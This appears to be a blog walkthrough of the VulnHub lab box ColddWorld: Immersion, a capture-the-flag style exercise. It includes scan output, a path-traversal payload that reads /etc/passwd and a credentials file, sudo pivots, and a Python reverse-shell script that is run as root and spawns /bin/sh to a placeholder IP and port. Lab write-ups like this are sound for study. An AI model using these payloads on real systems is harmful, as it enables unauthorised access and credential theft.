ColddWorld: Immersion is a vulnerable box from VulnHub that I would rate it as easy difficulty.
Nmap result:
$ sudo nmap -sC -sV 192.168.0.18 Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-02 10:23 EEST Nmap scan report for 192.168.0.18 Host is up (0.00029s latency). Not shown: 999 closed ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Immersion MAC Address: 08:00:27:22:E5:01 (Oracle VirtualBox virtual NIC)
Gobuster scan:
$ gobuster dir -u http://192.168.0.18 -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-medium-directories.txt -x php,txt /js (Status: 301) /css (Status: 301) /login (Status: 301) /secure (Status: 301) /wp (Status: 301) /server-status (Status: 403)
Page source for /login:
There is a file named carls.txt inside /var directory.The /wp page goes nowhere.
We can login to /login with random credentials. Checking the URL we can see that is using some parameters for user and password.
Let's see if we can find others parameter.
wfuzz -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt --hw 0 -u '192.168.0.18/login/account.php?FUZZ=../../../../../../../../etc/passwd' ===================================================================== ID Response Lines Word Chars Payload ===================================================================== 000000064: 200 31 L 43 W 1608 Ch "page"
And if we visit "http://192.168.0.18/login/account.php?page=../../../../../../../etc/passwd", we have LFI:
Retrieving carls credentials by accessing:
http://192.168.0.18/login/account.php?page=../../../../../../../var/carls.txt
Credentials:
$ nmap -p- 192.168.0.18 Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-02 10:36 EEST Nmap scan report for 192.168.0.18 Host is up (0.00029s latency). Not shown: 65533 closed ports PORT STATE SERVICE 80/tcp open http 3042/tcp open journee New port discovered: $ nmap -p3042 -sC -sV 192.168.0.18 Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-02 10:37 EEST Nmap scan report for 192.168.0.18 Host is up (0.00044s latency). PORT STATE SERVICE VERSION 3042/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 c7:43:9b:1e:c2:a8:27:6b:c2:bc:58:a9:4d:6d:4e:14 (RSA) | 256 60:99:c2:87:ea:6a:14:75:e1:b4:6f:93:4f:9b:fd:89 (ECDSA) |_ 256 7f:b2:4a:f2:ec:db:a5:87:45:92:2f:13:2e:5e:74:bd (ED25519) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
base64: Y2FybG9z decoded: carlos
Checking user carls privileges:
sudo -u c0ldd /bin/bash
We can run DoNotRun.py as root.
Note: Do not run that file because is an infinite loop:
#!/usr/bin/python import socket,subprocess,os s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(("Your IP",Port)) # Add your IP and Port here os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) p=subprocess.call(["/bin/sh","-i"])
sudo -u root /usr/bin/python3 /home/c0ldd/DoNotRun.py
Now you can get the user flag from user c0ldd's directory and the root flag from the root directory!
Comments
Post a Comment